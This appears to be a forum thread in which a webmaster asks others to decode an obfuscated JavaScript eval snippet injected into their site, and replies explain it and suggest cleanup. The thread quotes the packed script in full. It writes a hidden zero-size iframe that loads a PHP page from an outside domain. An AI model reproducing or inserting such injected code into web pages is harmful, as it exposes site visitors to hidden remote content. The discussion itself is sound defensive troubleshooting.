I just found out that my site added this weird line of code right before my </html> <script type="text/javascript"> eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6.7(\'<0 8=5://4.2.3/9/a.d f=1 e=1 b="c:g"></0>\');',17,17,'iframe||itexltd|com|sm|http|document|write|src|xp|index|style|display|php|height|width|none'.split('|'),0,{})); </script> PHP: Can anyone decrypt it? My ESET Smart Security was blocking some domain name... I'm wondering, what kind of information was being sent to it? I think the problem is I usually update on my Vista machine which I've tested and has no viruses, but my XP at my parents that I occasionally work with might be infected. If someone could decrypt that, I would very interested in knowing what the heck it did! Thanks
Thanks... Weird, that url doesn't even go anywhere. Well guess aside from some antivirus warnings popping up there wasn't much harm done (I hope). I have my parents computer and will be reformatting the hd and reinstalling Vista with ESET antivirus to make sure they don't mess it up again.
For future reference if you get the Firebug add-on for Firefox you can see the result of document.writes and other javascript changes to a page clearly. In other words you can see the output of scripts as if they were plainly in the HTML source code.
its quite clever actually.. What it does it opens up a small browser almost like a pop up.. And basically its to increase traffic on the site its directed to.. Thats how i would interpret it.. How it got there is another story you should be worried about!